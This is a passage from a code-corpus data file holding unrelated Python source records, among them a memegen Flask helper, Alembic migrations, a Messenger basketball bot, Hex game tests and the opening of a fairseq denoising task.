pprint\nimport logging\nfrom urllib.parse import unquote\n\nimport requests\nfrom flask import (Response, url_for, render_template, send_file,\n current_app, request)\n\nGITHUB_SLUG = \"jacebrowning/memegen\"\nGITHUB_BASE = \"https://raw.githubusercontent.com/{}/master/\".format(GITHUB_SLUG)\nCONTRIBUTING_URL = GITHUB_BASE + \"CONTRIBUTING.md\"\nCHANGES_URL = GITHUB_BASE + \"CHANGELOG.md\"\n\nlog = logging.getLogger(__name__)\n\n\ndef route(*args, **kwargs):\n \"\"\"Unquoted version of Flask's `url_for`.\"\"\"\n return unquote(url_for(*args, **kwargs))\n\n\ndef samples(blank=False):\n \"\"\"Generate dictionaries of sample image data for template rendering.\"\"\"\n for template in sorted(current_app.template_service.all()):\n path = \"_\" if blank else template.sample_path\n url = route('image.get', key=template.key, path=path)\n yield {\n 'key': template.key,\n 'name': template.name,\n 'url': url,\n }\n\n\ndef display(title, path, raw=False, mimetype='image/jpeg'):\n \"\"\"Render a webpage or raw image based on request.\"\"\"\n mimetypes = request.headers.get('Accept', \"\").split(',')\n browser = 'text/html' in mimetypes\n\n if browser:\n log.info(\"Rending image on page: %s\", request.url)\n html = render_template(\n 'image.html',\n src=request.url,\n title=title,\n ga_tid=get_tid(),\n )\n return html if raw else Response(html)\n\n else:\n log.info(\"Sending image: %s\", path)\n _track(title)\n return send_file(path, mimetype=mimetype)\n\n\ndef _track(title):\n \"\"\"Log the requested content, server-side.\"\"\"\n data = dict(\n v=1,\n tid=get_tid(),\n cid=request.remote_addr,\n\n t='event',\n ec='Image',\n ea='GET',\n el=str(title),\n\n uip=request.remote_addr,\n ua=request.user_agent.string,\n dr=request.referrer,\n )\n if get_tid(default=None):\n requests.post(\"http://www.google-analytics.com/collect\", data=data)\n else:\n log.debug(\"Analytics data:\\n%s\", pprint.pformat(data))\n\n\ndef get_tid(*, default='local'):\n \"\"\"Get the analtyics tracking identifier.\"\"\"\n return current_app.config['GOOGLE_ANALYTICS_TID'] or default\n","sub_path":"memegen/routes/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91497663","text":"\"\"\"cached_media_type_field\n\nRevision ID: 13c4ebad96ad\nRevises: b06a335b4faa\nCreate Date: 2018-05-20 20:45:04.180525\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '13c4ebad96ad'\ndown_revision = 'b06a335b4faa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('cached_media', sa.Column('type', sa.String(length=10), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('cached_media', 'type')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/13c4ebad96ad_cached_media_type_field.py","file_name":"13c4ebad96ad_cached_media_type_field.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354395586","text":"__author__ = 'Rolando.Morales'\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt4.QtGui import *\r\nfrom PyQt4.QtCore import *\r\nfrom about import *\r\n\r\nclass VistaAbout(QDialog,Ui_Dialog):\r\n def __init__(self):\r\n super(VistaAbout,self).__init__()\r\n self.setupUi(self)\r\n self.setFixedHeight(532)\r\n self.setFixedWidth(458)\r\n\r\n\r\n\r\n","sub_path":"VistaAbout.py","file_name":"VistaAbout.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520830760","text":"from itertools import permutations\n\n\ndef is_same(seq_1: list, seq_2: list):\n for shift in range(len(seq_1)):\n if seq_2 == (seq_1[-shift:] + seq_1[: -shift]):\n return True\n return False\n\n\ndef generate_sequences(ones_num: int, digits_num: int):\n sequences = list()\n zeros_num = digits_num - ones_num\n for sequence in permutations([0] * zeros_num + [1] * ones_num):\n is_add = True\n for seq in sequences:\n if is_same(list(sequence), list(seq)):\n is_add = False\n break\n if is_add:\n sequences.append(sequence)\n return sequences\n\n\ndef find_axes(sequence: list):\n axes = list()\n len_ = len(sequence)\n seq = sequence\n mid = len_ // 2\n if len_ % 2 == 0:\n for shift in range(mid):\n if seq[1:mid] == seq[:mid:-1]:\n axes.append([shift, \"nodes\"])\n if seq[:mid] == seq[:mid - 1:-1]:\n axes.append([shift, \"middles\"])\n seq = seq[-1:] + seq[: -1]\n else:\n for shift in range(len_):\n if seq == seq[::-1]:\n axes.append([len_ - shift - 1, \"mid_node\"])\n seq = seq[-1:] + seq[: -1]\n return axes\n\n\ndef print_axes(sequence: list):\n axis_ = find_axes(sequence)\n for node_ in axis_:\n type_ = node_[1]\n node_1 = node_[0]\n with open(\"result.csv\", 'a') as file:\n if type_ == \"nodes\":\n node_2 = (node_1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_1 or i is node_2:\n file.write(f\"({node})\")\n else:\n file.write(f\"{node}\")\n file.write(\" \")\n if type_ == \"middles\":\n node_2 = (node_1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_1 or i is node_2:\n file.write(\"|\")\n file.write(f\"{node}\")\n file.write(\" \")\n if type_ == \"mid_node\":\n node_2 = (node_1 + 1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_2:\n file.write(f'({node})')\n else:\n file.write(f\"{node}\")\n if i is node_1:\n file.write(\"|\")\n file.write(\" \")\n\n\nwith open(\"result.csv\", 'w') as file:\n file.write(\"Num of digits,Num of ones,Classes\\n\")\nfor n in range(3, 10):\n for k in range(n + 1):\n combinations = generate_sequences(k, n)\n with open(\"result.csv\", 'a') as file:\n file.write(f\"n={n},k = {k},\")\n for sequence_ in combinations:\n print_axes(sequence_)\n with open(\"result.csv\", 'a') as file:\n file.write(f\"\\n\")\n","sub_path":"Antonov Aleksei/Symmetry/Symmetry.py","file_name":"Symmetry.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386297506","text":"# coding=utf8\n\nimport re\n\n\ndef get_last_used_var(identifiers, previous_match=None, should_skip=None):\n if not should_skip:\n should_skip = lambda *_: False\n\n if previous_match:\n prev_var_match_found = False\n else:\n prev_var_match_found = True\n\n walked = {}\n for identifier_data in identifiers:\n (identifier, (line, column)) = identifier_data\n\n if should_skip(*identifier_data):\n continue\n\n if identifier in walked:\n continue\n\n if previous_match and identifier_data == previous_match:\n if previous_match[0] != identifier:\n return identifier_data\n\n if prev_var_match_found:\n return identifier_data\n\n walked[identifier] = True\n\n if previous_match == identifier_data:\n prev_var_match_found = True\n\n\ndef get_identifier_from_string(line, pattern, extract):\n matches = re.search(pattern, line)\n\n if not matches:\n return ('', 0)\n\n return extract(matches)\n\n\ndef get_identifier_under_cursor(\n buffer, cursor,\n pattern='([\\w.]+)$', extract=lambda m: (m.group(1), m.start(1))\n):\n (line_number, column_number) = cursor\n line = buffer[line_number-1][:column_number]\n identifier, start_at = get_identifier_from_string(line, pattern, extract)\n if identifier:\n return (identifier, (line_number, start_at + 1))\n else:\n return None\n\n\ndef get_possible_identifiers(\n buffer, cursor,\n pattern=r'([\\w.]+)(?![\\w.]*\\()',\n extract=lambda m: (m.group(1), m.start(1))\n):\n line_number, _ = cursor\n identifiers = []\n\n for line in reversed(buffer[:line_number]):\n line_number -= 1\n matches = re.finditer(pattern, line)\n\n if not matches:\n continue\n\n for match in reversed(list(matches)):\n identifier, start_at = extract(match)\n identifiers.append(\n (identifier, (line_number + 1, start_at + 1))\n )\n\n return identifiers\n\n\ndef get_defined_identifiers(\n buffer, cursor, pattern\n):\n line_number, _ = cursor\n identifiers = []\n\n for line in reversed(buffer[:line_number-1]):\n line_number -= 1\n matches = re.finditer(pattern, line)\n\n if not matches:\n continue\n\n for match in reversed(list(matches)):\n group_id = 1\n if not match.group(group_id):\n group_id = 2\n identifier = match.group(group_id)\n identifiers.append((identifier, (line_number, match.start(group_id)+1)))\n\n return identifiers\n\n\n\ndef get_higher_indent(buffer, cursor):\n line_number, _ = cursor\n\n current_indent, _ = get_indentation(buffer[line_number])\n for line in reversed(buffer[:line_number]):\n line_number -= 1\n if line == '':\n continue\n line_indent, _ = get_indentation(line)\n if current_indent > line_indent:\n return (line, line_number)\n\n return None\n\n\ndef match_higher_indent(buffer, cursor, pattern):\n line_number, _ = cursor\n while True:\n indent = get_higher_indent(buffer, (line_number, 0))\n if not indent:\n return\n line, line_number = indent\n if re.search(pattern, line.strip()):\n return indent\n\ndef match_exact_indent(buffer, cursor, amount, pattern):\n for line_number in range(cursor[0], len(buffer)):\n line = buffer[line_number]\n line_indent, _ = get_indentation(line)\n if line_indent != amount:\n continue\n if re.search(pattern, line):\n return (line_number, 0)\n\n return None\n\ndef get_indentation(line):\n indent = len(line) - len(line.lstrip())\n return indent, line[:indent]\n\n\ndef get_prev_nonempty_line(buffer, cursor_line):\n for line in reversed(buffer[:cursor_line]):\n if line.strip() == \"\":\n continue\n return line\n return \"\"\n\n\ndef ensure_newlines(buffer, line_number, amount):\n for line in reversed(buffer[:line_number]):\n if line != '':\n break\n\n if amount <= 0:\n break\n\n amount -= 1\n line_number -= 1\n\n return line_number, amount\n\ndef get_next_nonempty_line(buffer, cursor_line):\n cursor_line += 1\n for line in buffer[cursor_line:]:\n if line.strip() == \"\":\n cursor_line += 1\n continue\n return line, cursor_line\n return \"\", 0\n\ndef to_vim_cursor(cursor):\n return (cursor[0]+1, cursor[1]+1)\n\ndef from_vim_cursor(cursor):\n return (cursor[0]-1, cursor[1]-1)\n\ndef insert_lines_before(buffer, cursor, lines):\n buffer[cursor[0]:cursor[0]] = lines\n\n\ndef is_cursor_between(line, cursor, before, after):\n if not re.search(before, line[:cursor[1]+1]):\n return False\n\n if not re.search(after, line[cursor[1]:]):\n return False\n\n return True\n","sub_path":"pythonx/px/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277088970","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score,f1_score,confusion_matrix\nimport numpy as np\nimport torch\nfrom sklearn import preprocessing\nimport torch.utils.data as Data\nimport models\nfrom nn import nn_test\nfrom ml import clf_train_test\nimport matplotlib.pyplot as plt\nimport itertools\nimport copy\nfrom pandas import DataFrame\nfrom itertools import combinations\n\nmodel_file = './data/model_gan.pkl'\nisnn = False\ndef main():\n data = pd.read_table('./data/diabetes.txt', sep=',')\n predictors = [f for f in data.columns if f not in ['Outcome']]\n X = np.array(data[predictors])\n Y = np.array(data['Outcome'])\n traincount = int(len(Y) * 0.6)\n scaler = preprocessing.MinMaxScaler()\n X = scaler.fit_transform(X)\n test_x = X[traincount:]\n test_y = Y[traincount:]\n ml_pred = clf_train_test(test_x, test_y, False)\n if isnn:\n X = torch.FloatTensor(X)\n Y = torch.LongTensor(Y)\n nn_test_x = X[traincount:]\n nn_test_y = Y[traincount:]\n test_dataset = Data.TensorDataset(nn_test_x, nn_test_y)\n testloader = Data.DataLoader(\n dataset=test_dataset,\n batch_size=1,\n shuffle=True,\n num_workers=2,\n )\n model = models.init_model(name='nn1')\n model.load_state_dict(torch.load(model_file))\n nn_pred = nn_test(testloader,model)\n ml_pred.append(nn_pred)\n\n pred = np.array(ml_pred)\n\n # bestmodel(0,2,5,6,7)('et','svc','xgb','lgbm','catboost')\n c_all = pred[0] + pred[2] + pred[5]+ pred[6] + pred[7]\n c_all = np.where(c_all > 2.5, 1, 0)\n accuracy = accuracy_score(c_all, test_y)\n f1 = f1_score(c_all, test_y)\n cm = confusion_matrix(c_all, test_y)\n print('c_all accuracy:', accuracy)\n print('c_all f1:', f1)\n class_names = ['样本0', '样本1']\n plot_confusion_matrix(cm,class_names,normalize=True,title='模型融合(GAN)')\n\n# 混淆矩阵绘制\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.rcParams['font.sans-serif'] = ['SimHei']\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('真实样本')\n plt.xlabel('预测样本')\n plt.show()\n\n # for c in combinations(pred, 3):\n # c_all = c[0]+c[1]+c[2]\n # c_all = np.where(c_all > 1.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n #\n # for c in combinations(pred, 5):\n # c_all = c[0]+c[1]+c[2]+c[3]+c[4]\n # c_all = np.where(c_all > 2.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n #\n # for c in combinations(pred, 7):\n # c_all = c[0]+c[1]+c[2]+c[3]+c[4]+c[5]+c[6]\n # c_all = np.where(c_all > 3.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n\nif __name__=='__main__':\n main()\n\n","sub_path":"MLClass/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534817771","text":"\"\"\"empty message\n\nRevision ID: d397e23ee861\nRevises: 6efae7b1c2f5\nCreate Date: 2020-07-21 00:53:57.195159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd397e23ee861'\ndown_revision = '6efae7b1c2f5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('seeking_description', sa.String(length=500), nullable=True))\n op.add_column('Venue', sa.Column('seeking_talent', sa.Boolean(), nullable=True))\n op.execute('UPDATE \"Venue\" SET seeking_talent=False WHERE seeking_description IS NULL')\n op.alter_column('Venue','seeking_talent',nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Venue', 'seeking_talent')\n op.drop_column('Venue', 'seeking_description')\n # ### end Alembic commands ###\n","sub_path":"projects/01_fyyur/starter_code/migrations/versions/d397e23ee861_.py","file_name":"d397e23ee861_.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441385151","text":"import csv\n\nfile = open('./1_questions.csv', 'a')\n\nwith open('0_questions.csv', 'rb') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n if row[1] == '?':\n row[1] = \"%s or %s ?\" % (row[2], row[3])\n file.write(','.join(row))\n file.write(\"\\n\")\n\n","sub_path":"data/s0_set_question_text.py","file_name":"s0_set_question_text.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61522002","text":"#!/usr/bin/python3\n\"\"\"Modulo 3-Square\n\nthis module define a class Square with a method area\n\n\"\"\"\n\n\nclass Square():\n \"\"\"Empty class Square\n\n this is an empty class that define an square\n\n __size:\n the size of the square as integer.\n\n _position:\n The position of the square, since the current position of the cursor, as\n a tuple of two integers.\n (x , y)\n __ __ __ x\n |\n |\n |\n y\n\n \"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Constructor of the class\n\n Args:\n size (int): the initial size of the square, can't be negative\n position (int, int): the initial position of the square,\n cant be negatives\n \"\"\"\n self.size = size\n self.position = position\n\n def area(self):\n \"\"\"Calculate and retrun the area of the square based in its size\"\"\"\n\n return (self.__size**2)\n\n @property\n def size(self):\n \"\"\"returns the size of the Square\"\"\"\n\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"set the size of the Square\n Args:\n value (int): the initial size of the square, can't be negative\n \"\"\"\n\n if type(value) != int:\n raise TypeError(\"size must be an integer\")\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n\n @property\n def position(self):\n \"\"\"return the value of the position of the square\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"set the value of the position of the square\n\n Args:\n value (int, int): the initial position of the square,\n cant be negatives\n \"\"\"\n if (type(value) != tuple or\n len(value) != 2 or\n type(value[0]) != int or\n value[0] < 0 or\n type(value[1]) != int or\n value[1] < 0):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n self.__position = value\n\n def my_print(self):\n \"\"\"prints the Square with # symbols\"\"\"\n\n if self.__size == 0:\n print()\n else:\n print('\\n' * self.__position[1], end='')\n for i in range(self.__size):\n print(' ' * self.__position[0], end='')\n print('#' * self.__size)\n","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49414893","text":"import employee\r\n\r\ndef main():\r\n #Create empty list to hold the entry\r\n entry = []\r\n \r\n #Create loop to ask user input 3 persons information\r\n for count in range(0, 3):\r\n name = input('Enter name: ')\r\n id_num = input('Enter ID Number: ')\r\n dept = input('Enter Department: ')\r\n title = input('Enter Title: ')\r\n\r\n #cearte entry\r\n entry.append(employee.Employee(name, id_num, dept, title))\r\n print()\r\n \r\n for info in entry:\r\n print(info)\r\n print()\r\nmain()\r\n\r\n","sub_path":"Chap 10/Exercises/employee_ex.py","file_name":"employee_ex.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403641865","text":"import json\nimport os\nimport requests\n\nfrom django.http.response import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import generic\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom vbl_api import VBLInterface\n\nVBL_URL = 'http://vblcb.wisseq.eu/VBLCB_WebService/data/'\n\nACCESS_TOKEN = os.environ.get('ACCESS_TOKEN', None)\nFACEBOOK_URL = os.environ.get('FACEBOOK_URL', None)\nVERIFY_TOKEN = os.environ.get('VERIFY_TOKEN', None)\n\n\nclass MessengerBotView(generic.View):\n def get(self, request, *args, **kwargs):\n if self.request.GET.get('hub.verify_token', False) == VERIFY_TOKEN:\n return HttpResponse(self.request.GET['hub.challenge'])\n else:\n return HttpResponse('Error, invalid token')\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return generic.View.dispatch(self, request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n incoming_message = json.loads(self.request.body.decode('utf-8'))\n for entry in incoming_message['entry']:\n for message in entry['messaging']:\n if 'message' in message:\n fb_id = message['sender']['id']\n response = self.create_response(message['message']['text'])\n return self.send_message(fb_id, response)\n return HttpResponse()\n\n def create_response(self, message):\n return 'Your message: %s' % message\n vbl_interface = VBLInterface()\n\n if 'team' in message:\n return vbl_interface.response_team_data(message)\n\n if 'club' in message:\n return vbl_interface.response_club_data(message)\n\n return 'Please provide keywords team or club in your message.'\n\n def send_message(self, fb_id, message):\n post_message_url = '%s?access_token=%s' % (FACEBOOK_URL, ACCESS_TOKEN)\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n # Send a response to the client.\n values = {\n \"recipient\": {\"id\": fb_id},\n \"message\": {\"text\": message}\n }\n requests.post(post_message_url, headers=headers, data=json.dumps(values))\n\n\ndef home(request):\n vbl_interface = VBLInterface()\n club_teams = vbl_interface.response_club_data('club BBC As ')\n # return HttpResponse(json.dumps(club_teams), content_type=\"application/json\")\n\n my_team = find_team_from_club(club_teams, 'BBC As HSE A')\n team_guid = my_team['guid']\n team_data = load_team_data(team_guid)[0]\n team_competitions = team_data['poules']\n\n my_competition = find_competition_from_team(team_competitions, '3e Provinciale Heren Limburg B')\n competition_guid = my_competition['guid']\n competition_data = load_competition_data(competition_guid)\n\n team_results = load_team_results(team_guid)\n\n return HttpResponse(json.dumps(team_results), content_type=\"application/json\")\n\n\ndef load_team_results(team_guid):\n url = '%sTeamMatchesByGuid?teamGuid=%s' % (VBL_URL, team_guid)\n result_data = requests.get(url).json()\n return result_data\n\n\ndef load_competition_data(competition_guid):\n url = '%spouleByGuid?pouleguid=%s' % (VBL_URL, competition_guid)\n competition_data = requests.get(url).json()\n return competition_data\n\n\ndef find_competition_from_team(team_competitions, competition):\n for team_comp in team_competitions:\n if team_comp['naam'] == competition:\n return team_comp\n\n\ndef find_team_from_club(club_teams, team):\n for club_team in club_teams:\n if club_team['naam'] == team:\n return club_team\n\n\ndef load_team_data(team_guid):\n url = '%sTeamDetailByGuid?teamGuid=%s' % (VBL_URL, team_guid)\n team_data = requests.get(url).json()\n return team_data\n","sub_path":"vbl_messenger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525398819","text":"import numpy as np\n\nimport TerminatorHex\nimport MCTSHex\nfrom Hex import *\n\nif __name__ == '__main__':\n enable_GUI = True\n enable_interactive_text = True\n board_size = 5\n n_players = 0\n ai_color = HexBoard.RED\n terminator_AI = TerminatorHex.TerminatorHex(3, True, random_seed='random', do_transposition=True, do_iterative_deepening=True)\n mcts_AI = MCTSHex.MCTSHex(500, 10, expansion_function=('constant', 1), enh_WinScan=True, enh_EnsureTopLevelExplr=True)\n board = HexUI(board_size, n_players=n_players, enable_gui=enable_GUI, interactive_text=enable_interactive_text,\n ai_move=terminator_AI.terminator_move, ai_color=ai_color,\n blue_ai_move=terminator_AI.terminator_move, red_ai_move=mcts_AI.MCTS_move,\n move_list=[])\n\n if not enable_GUI and not enable_interactive_text:\n\n # sanity check that wins are detected\n for i in range(0, 2):\n winner = HexBoard.RED if i == 0 else HexBoard.BLUE\n loser = HexBoard.BLUE if i == 0 else HexBoard.RED\n board = HexBoard(3)\n board.place_with_color((1, 1), loser)\n board.place_with_color((2, 1), loser)\n board.place_with_color((1, 2), loser)\n board.place_with_color((2, 2), loser)\n board.place_with_color((0, 0), winner)\n board.place_with_color((1, 0), winner)\n board.place_with_color((2, 0), winner)\n board.place_with_color((0, 1), winner)\n board.place_with_color((0, 2), winner)\n assert (board.check_win(winner) == True)\n assert (board.check_win(loser) == False)\n board.print_board()\n endable_board = HexBoard(4)\n # sanity check that random play will at some point end the game\n while not endable_board.game_over:\n endable_board.place_with_color((np.random.randint(0, 4), np.random.randint(0, 4)), HexBoard.RED)\n assert (endable_board.game_over == True)\n assert (endable_board.check_win(HexBoard.RED) == True)\n assert (endable_board.check_win(HexBoard.BLUE) == False)\n print(\"Randomly filled board\")\n endable_board.print_board()\n\n neighbor_check = HexBoard(5)\n assert (neighbor_check.get_neighbors((0, 0)) == [(1, 0), (0, 1)])\n assert (neighbor_check.get_neighbors((0, 1)) == [(1, 1), (1, 0), (0, 2), (0, 0)])\n assert (neighbor_check.get_neighbors((1, 1)) == [(0, 1), (2, 1), (0, 2), (2, 0), (1, 2), (1, 0)])\n assert (neighbor_check.get_neighbors((3, 4)) == [(2, 4), (4, 4), (4, 3), (3, 3)])\n assert (neighbor_check.get_neighbors((4, 3)) == [(3, 3), (3, 4), (4, 4), (4, 2)])\n assert (neighbor_check.get_neighbors((4, 4)) == [(3, 4), (4, 3)])\n neighbor_check_11 = HexBoard(5)\n assert (neighbor_check_11.get_neighbors((4, 4)) == [(3, 4), (4, 3)])\n\n neighbor_check_small = HexBoard(2)\n assert (neighbor_check_small.get_neighbors((0, 0)) == [(1, 0), (0, 1)])\n assert (neighbor_check_small.get_neighbors((1, 0)) == [(0, 0), (0, 1), (1, 1)])\n assert (neighbor_check_small.get_neighbors((0, 1)) == [(1, 1), (1, 0), (0, 0)])\n assert (neighbor_check_small.get_neighbors((1, 1)) == [(0, 1), (1, 0)])\n\n neighbor_check_sanity = HexBoard(11)\n for x in range(0, 11):\n for y in range(0, 11):\n neighbors = neighbor_check_sanity.get_neighbors((x, y))\n for neighbor in neighbors:\n neighbors_neighbors = neighbor_check_sanity.get_neighbors(neighbor)\n index_of_self = neighbors_neighbors.index((x, y))\n assert (index_of_self != -1)\n\n# main() # replaced by __name__ == '__main__'\n","sub_path":"A4/HexGame.py","file_name":"HexGame.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493137542","text":"#!python3\n'''\n updateProduce.py - corrige os preços em uma planilha de venda de produtos\n'''\nimport openpyxl\n\nwb = openpyxl.load_workbook('produceSales.xlsx')\nsheet = wb['Sheet']\nPRICE_UPDATES = {'Garlic': 4.01, 'Celery': 2.19, 'Lemon': 0.99}\n# Percorre todas as linhas em um loop e atualiza os preços\nfor rowNum in range(2, len(sheet['A'])):\n produceName = sheet.cell(row=rowNum, column=1).value\n if produceName in PRICE_UPDATES:\n sheet.cell(row=rowNum, column=2).value = PRICE_UPDATES[produceName]\n\nwb.save('updatedSales.xlsx')\n","sub_path":"updateProduce_v2.py","file_name":"updateProduce_v2.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569196485","text":"# Copyright (c) Facebook, Inc. and its affiliates.\r\n#\r\n# This source code is licensed under the MIT license found in the\r\n# LICENSE file in the root directory of this source tree.\r\n\r\nimport logging\r\nimport os\r\n\r\nimport numpy as np\r\nfrom fairseq.data import (\r\n AppendTokenDataset,\r\n ConcatDataset,\r\n DenoisingDataset,\r\n Dictionary,\r\n PrependTokenDataset,\r\n ResamplingDataset,\r\n SortDataset,\r\n TokenBlockDataset,\r\n data_utils,\r\n)\r\nfrom fairseq.data.encoders.utils import get_whole_word_mask\r\nfrom fairseq.tasks import register_task\r\n\r\nfrom .denoising import DenoisingTask\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@register_task(\"multilingual_denoising\")\r\nclass MultilingualDenoisingTask(DenoisingTask):\r\n @staticmethod\r\n def add_args(parser):\r\n DenoisingTask.add_args(parser)\r\n parser.add_argument(\r\n \"--multilang-sampling-alpha\",\r\n type=float,\r\n default=1.0,\r\n help=\"smoothing alpha for sample ratios across multiple datasets\",\r\n )\r\n parser.add_argument(\"--add-lang-token\", default=False, action=\"store_true\")\r\n parser.add_argument(\r\n \"--langs\", type=str, help=\"language ids we are considering\", default=None\r\n )\r\n parser.add_argument(\r\n \"--no-whole-word-mask-langs\",\r\n type=str,\r\n default=\"\",\r\n metavar=\"N\",\r\n help=\"languages without spacing between words dont support whole word masking\",\r\n )\r\n\r\n @classmethod\r\n def setup_task(cls, args, **kwargs):\r\n \"\"\"Setup the task.\"\"\"\r\n paths = args.data.split(\":\")\r\n assert len(paths) > 0\r\n dictionary = Dictionary.load(os.path.join(paths[0], \"dict.txt\"))\r\n\r\n data_path = paths[0]\r\n if args.langs is None:\r\n languages = sorted(\r\n [\r\n name\r\n for name in os.listdir(data_path)\r\n if os.path.isdir(os.path.join(data_path, name))\r\n ]\r\n )\r\n else:\r\n languages = args.langs.split(\",\")\r\n\r\n if args.add_lang_token:\r\n for lang in languages:\r\n dictionary.add_symbol(\"[{}]\".format(lang))\r\n\r\n logger.info(\"dictionary: {} types\".format(len(dictionary)))\r\n if not hasattr(args, \"shuffle_instance\"):\r\n args.shuffle_instance = False\r\n return cls(args, dictionary)\r\n\r\n def __init__(self, args, dictionary):\r\n super().__init__(args, dictionary)\r\n self.dictionary = dictionary\r\n self.seed = args.seed\r\n\r\n # add mask token\r\n self.mask_idx = self.dictionary.add_symbol(\"\")\r\n self.langs = args.langs\r\n self.args = args\r\n\r\n def _get_sample_prob(self, dataset_lens):\r\n \"\"\"\r\n Get smoothed sampling porbability by languages. This helps low resource\r\n languages by upsampling them.\r\n \"\"\"\r\n prob = dataset_lens / dataset_lens.sum()\r\n smoothed_prob = prob ** self.args.multilang_sampling_alpha\r\n smoothed_prob = smoothed_prob / smoothed_prob.sum()\r\n return smoothed_prob\r\n\r\n def load_dataset(self, split, epoch=1, combine=False, **kwargs):\r\n \"\"\"Load a given dataset split.\r\n\r\n Args:\r\n split (str): name of the split (e.g., train, valid, test)\r\n \"\"\"\r\n paths = self.args.data.split(\":\")\r\n assert len(paths) > 0\r\n data_path = paths[(epoch - 1) % len(paths)]\r\n split_path = os.path.join(data_path, split)\r\n\r\n if self.langs is None:\r\n languages = sorted(\r\n [\r\n name\r\n for name in 